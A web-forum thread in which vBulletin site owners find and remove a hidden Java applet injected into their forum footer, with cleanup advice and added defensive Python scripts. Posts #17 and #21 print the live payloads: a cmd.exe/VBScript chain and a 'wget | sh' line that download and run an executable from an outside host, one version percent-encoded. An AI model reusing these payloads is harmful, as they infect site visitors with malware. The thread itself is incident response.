Vbulletin Virus URGENT HELP
  • #16
    OK, try now: version 4.1.4, uploaded new files and still having the issue.



    • #17
      Found something:
      Code:
      <div id="box"> 
      <applet width='1' height='1' code='Client.class' archive='http://zolus.org/Client.jar'> 
      <param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs  http://zolus.org/s.exe %temp%\update.exe'> 
      <param name='windows2' value=''> 
       
      <param name='unix1' value=""> 
      <param name='unix2' value=""> 
       
      <param name='linux1' value="wget  http://zolus.org/s.exe -O- | sh"> 
      <param name='linux2' value=""> 
       
      </applet> 
      </div>
      hxxp://www.carpy.co.uk/search.php?do=getdaily&contenttype=vBForum_Post but I think the default skin just changed?
      I think that skin has the problem. Java malware.

      I have reported the jar host to google for malware blocking (not your site)



      • #18
        A cheer for ZeroHour!

        Found the damn thing in the footer template. Removed, looking good! I've upgraded and still unsure how that would be done.

        Really appreciated, pop in sometime, I do a great cup of tea!



        • #19
          Originally posted by PondPikey
          A cheer for ZeroHour!

          Found the damn thing in the footer template. Removed, looking good! I've upgraded and still unsure how that would be done.

          Really appreciated, pop in sometime, I do a great cup of tea!


          Find your Apache logs and take a look through them for those accessing admincp/ etc. other than your IP (www.whatismyip.com) to see if you can find the issue. Were you running 4.0.8 PL3?
          The logs will be key, as there are rumours of a possible exploit in other versions but it's all unconfirmed right now.
          The best thing you can do is zip up your HTTP, error and admincp logs and send your story to vBulletin via the members area, giving as good a timeline as possible to help them see if they spot anything. Also a mods list would be good, as some mods had major holes (paste that here as well, ideally).

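Added example (not ZeroHour's or vBulletin's code) of the log check described in #19: it parses Apache combined-format access log lines and lists every request to admincp/ or modcp/ that came from an address other than the ones you pass in as your own. The log lines, addresses and query strings below are constructed for the example; point it at your real access_log instead.

```python
"""List admin-panel requests in an Apache access log that did not come from us.

Added example for this thread, not vBulletin's own tooling. Assumes the Apache
"combined" log format and a vBulletin install with admincp/ and modcp/ under
the web root.
"""
import re
from collections import Counter, defaultdict

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# The paths #19 says to watch; modcp/ is vBulletin's moderator panel.
WATCHED_PREFIXES = ("/admincp/", "/modcp/")


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not fit."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_admin_hits(lines, own_ips):
    """Return parsed entries that hit a watched path from an IP not in own_ips."""
    own = set(own_ips)
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue                      # unparseable line: skip, don't crash
        path = entry["path"].split("?", 1)[0]
        if path.startswith(WATCHED_PREFIXES) and entry["ip"] not in own:
            hits.append(entry)
    return hits


def summarize(hits):
    """Per-IP request count and the distinct admin paths each IP touched."""
    counts = Counter(h["ip"] for h in hits)
    paths = defaultdict(set)
    for h in hits:
        paths[h["ip"]].add(h["path"].split("?", 1)[0])
    return {ip: {"count": counts[ip], "paths": sorted(paths[ip])} for ip in counts}


# Constructed sample log lines (addresses are documentation ranges, not real hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Jan/2011:19:02:11 +0000] "GET /admincp/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [20/Jan/2011:19:03:40 +0000] "POST /admincp/template.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [20/Jan/2011:19:05:00 +0000] "GET /forumdisplay.php?f=3 HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [20/Jan/2011:19:09:15 +0000] "POST /admincp/template.php HTTP/1.1" 200 812 "-" "Python-urllib/2.6"',
    '192.0.2.77 - - [20/Jan/2011:19:09:16 +0000] "GET /admincp/index.php?do=home HTTP/1.1" 200 5120 "-" "Python-urllib/2.6"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    # Replace SAMPLE_LOG with open("/var/log/apache2/access_log") and the
    # list with your own address(es) from www.whatismyip.com.
    hits = suspicious_admin_hits(SAMPLE_LOG, ["203.0.113.5"])
    for ip, info in summarize(hits).items():
        print(ip, info["count"], "request(s):", ", ".join(info["paths"]))
```

Matching on the path prefix rather than grepping for the word "admincp" keeps referer strings and search queries from producing false hits, and the parser skipping unparseable lines matters on real logs, which always contain a few.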


          • #20
            Will do ZH, Again, much appreciated.



            • #21
              Same thing happened to me, my FTP client says that a few files were uploaded at 1909 on the 20th. This was the code in the footer:

              Code:
              <script type='text/javascript' language='Javascript'>document.write(unescape('%3c%61%70%70%6c%65%74%20%77%69%64%74%68%3d%27%31%27%20%68%65%69%67%68%74%3d%27%31%27%20%63%6f%64%65%3d%27%4a%61%76%61%2e%63%6c%61%73%73%27%20%61%72%63%68%69%76%65%3d%27%4a%61%76%61%2e%6a%61%72%27%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%75%72%6c%27%20%76%61%6c%75%65%3d%27%68%74%74%70%3a%2f%2f%7a%6f%6c%75%73%2e%6f%72%67%2f%73%2e%65%78%65%27%20%2f%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%6c%6f%63%61%74%69%6f%6e%27%20%76%61%6c%75%65%3d%27%25%41%50%50%44%41%54%41%25%27%20%2f%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%66%69%6c%65%27%20%76%61%6c%75%65%3d%27%73%2e%65%78%65%27%20%2f%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%72%27%20%76%61%6c%75%65%20%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%27%20%2f%3e%3c%2f%61%70%70%6c%65%74%3e'));</script>
              It leads to some sort of script at zolus.org

              I've changed my forum password and am now asking my host to change my ftp password, as that's the only way I can think of that they'd be able to upload files to the server. I'm running 4.0.6 patch level 1, time to upgrade I guess...
              Photography :: Bird Information and Help

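Added example, not part of Tailfeathers' post: a triage script that decodes the unescape() string above (copied exactly as posted) back to the <applet> tag it writes into the page, and also catches a cleartext <applet> like the one found in #17. For each applet it reports the class name, whether it is sized 1x1 to stay invisible, and which remote URLs its parameters name. The cleartext sample and its example.invalid host are constructed for the example.

```python
"""Decode an injected footer template and list what its <applet> would load.

Added example for this thread, not code from the forum posts. Handles both the
cleartext <applet> from #17 and the document.write(unescape(...)) variant from
#21.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Matches the unescape('...') call the injected <script> uses.
UNESCAPE_RE = re.compile(r"unescape\(\s*'([^']*)'\s*\)")


class AppletCollector(HTMLParser):
    """Collect every <applet> tag with its attributes and <param> children."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "applet":
            self._current = {"attrs": attrs, "params": {}}
            self.applets.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][attrs.get("name", "")] = attrs.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "applet":
            self._current = None


def fragments(template_text):
    """Yield the template itself, then each unescape('...') literal decoded.

    Decoded payloads are parsed on their own because HTMLParser treats the body
    of <script> as raw text and would never see tags written from inside it.
    """
    yield template_text
    for m in UNESCAPE_RE.finditer(template_text):
        yield unquote(m.group(1))   # one pass, like JavaScript's unescape()


def find_applets(template_text):
    found = []
    for frag in fragments(template_text):
        parser = AppletCollector()
        parser.feed(frag)
        parser.close()
        found.extend(parser.applets)
    return found


def triage(template_text):
    """Report each applet: class, whether it is hidden at 1x1, and remote URLs."""
    findings = []
    for a in find_applets(template_text):
        attrs, params = a["attrs"], a["params"]
        candidates = [attrs.get("archive") or ""] + list(params.values())
        urls = [v for v in candidates if v.lower().startswith(("http://", "https://"))]
        findings.append({
            "code": attrs.get("code"),
            "hidden": attrs.get("width") == "1" and attrs.get("height") == "1",
            "urls": urls,
            "params": params,
        })
    return findings


# The footer injection exactly as posted in #21 above.
ENCODED_FOOTER = (
    "<script type='text/javascript' language='Javascript'>document.write(unescape('"
    "%3c%61%70%70%6c%65%74%20%77%69%64%74%68%3d%27%31%27%20%68%65%69%67%68%74%3d%27%31%27"
    "%20%63%6f%64%65%3d%27%4a%61%76%61%2e%63%6c%61%73%73%27%20%61%72%63%68%69%76%65%3d%27%4a%61%76%61%2e%6a%61%72%27%3e"
    "%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%75%72%6c%27%20%76%61%6c%75%65%3d%27%68%74%74%70%3a%2f%2f%7a%6f%6c%75%73%2e%6f%72%67%2f%73%2e%65%78%65%27%20%2f%3e"
    "%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%6c%6f%63%61%74%69%6f%6e%27%20%76%61%6c%75%65%3d%27%25%41%50%50%44%41%54%41%25%27%20%2f%3e"
    "%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%66%69%6c%65%27%20%76%61%6c%75%65%3d%27%73%2e%65%78%65%27%20%2f%3e"
    "%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%72%27%20%76%61%6c%75%65%20%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%27%20%2f%3e"
    "%3c%2f%61%70%70%6c%65%74%3e"
    "'));</script>"
)

# Constructed cleartext variant in the shape of the #17 finding; the host and the
# parameter value are placeholders, not the real payload.
CLEARTEXT_FOOTER = (
    "<div id=\"box\">"
    "<applet width='1' height='1' code='Client.class' archive='http://example.invalid/Client.jar'>"
    "<param name='windows1' value='[constructed placeholder]'>"
    "</applet></div>"
)

if __name__ == "__main__":
    for sample in (ENCODED_FOOTER, CLEARTEXT_FOOTER):
        for f in triage(sample):
            print(f["code"], "hidden" if f["hidden"] else "visible", f["urls"])
```

The URLs this prints are what to report to the hosting provider and to the browser blocklists, and the decoded parameter names (url, location, file) tell you what the applet was built to do without having to run it.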


              • #22
                Originally posted by Tailfeathers
                Same thing happened to me, my FTP client says that a few files were uploaded at 1909 on the 20th. This was the code in the footer:

                Was your MySQL password the same as your FTP?
                What permissions were set on the dir they uploaded to?

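Added example, not from the thread, for following up the permissions question in #22: a scan of the document root that lists files modified after a given time (to match against the upload time the FTP client showed) and directories that anyone on the host can write into. The sample web root is constructed in a temporary directory so the script runs offline.

```python
"""Triage a web root after an unexplained upload: which files changed after a
given time, and which directories anyone on the host could write into.

Added example for this thread, not vBulletin's own tooling. The sample tree is
constructed in a temporary directory; point scan() at a real document root to
use it for real.
"""
import os
import stat
import tempfile
import time


def is_world_writable(mode):
    # Sticky directories (like /tmp) let others create files but not remove each
    # other's, so they are not reported alongside a plain 0777 directory.
    return bool(mode & stat.S_IWOTH) and not (mode & stat.S_ISVTX)


def scan(root, since_epoch):
    """Return (recent_files, open_dirs), both as paths relative to root.

    recent_files: regular files with mtime >= since_epoch, oldest first.
    open_dirs:    directories with the other-write bit set and no sticky bit.
    """
    recent, open_dirs = [], []
    for dirpath, _dirnames, filenames in os.walk(root):
        if is_world_writable(os.lstat(dirpath).st_mode):
            open_dirs.append(os.path.relpath(dirpath, root))
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)          # lstat: never follow a planted symlink
            if stat.S_ISREG(st.st_mode) and st.st_mtime >= since_epoch:
                recent.append((os.path.relpath(path, root), st.st_mtime))
    recent.sort(key=lambda item: item[1])
    open_dirs.sort()
    return recent, open_dirs


def recent_changes(root, hours=24):
    """Convenience wrapper: everything changed in the last `hours` hours."""
    return scan(root, time.time() - hours * 3600)


def build_sample_tree():
    """Constructed sample web root: one week-old file, and one file written just
    now into a directory left at 0777 (the permission problem #22 asks about)."""
    root = tempfile.mkdtemp(prefix="vbroot-")     # mkdtemp creates it 0700
    misc = os.path.join(root, "images", "misc")
    os.makedirs(misc)
    os.makedirs(os.path.join(root, "admincp"))
    for d in ("images", "admincp"):
        os.chmod(os.path.join(root, d), 0o755)     # normal, not world-writable
    old = os.path.join(root, "index.php")
    fresh = os.path.join(misc, "Java.jar")         # name taken from the #21 payload
    for path in (old, fresh):
        with open(path, "w") as fh:
            fh.write("placeholder\n")
    week_ago = time.time() - 7 * 86400
    os.utime(old, (week_ago, week_ago))
    os.chmod(misc, 0o777)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    # Use the upload time from the FTP log as the cut-off on a real server.
    recent, open_dirs = recent_changes(root, hours=24)
    for rel, mtime in recent:
        print("modified", time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(mtime)), rel)
    for rel in open_dirs:
        print("world-writable", rel)
```

On a real install the interesting output is any file under the template or image directories with an mtime near the FTP upload time, and any directory the web server or other local users can write into; those are the ones to lock down after the passwords are changed.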
